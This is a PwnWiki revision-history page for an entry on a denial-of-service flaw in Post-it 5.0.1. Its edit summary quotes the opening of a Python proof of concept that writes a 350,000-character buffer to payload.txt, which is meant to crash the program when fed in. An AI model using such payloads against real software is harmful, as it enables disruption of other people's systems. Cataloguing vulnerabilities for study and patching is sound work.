Revision history of "Post-it 5.0.1 拒絕服務漏洞"

From PwnWiki

Diff selection: Mark the radio boxes of the revisions to compare and hit enter or the button at the bottom.
Legend: (cur) = difference with latest revision, (prev) = difference with preceding revision, m = minor edit.

  • curprev 09:31, 15 June 2021Pwnwiki talk contribs 191 bytes +191 Created page with "==POC== <pre> #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be..."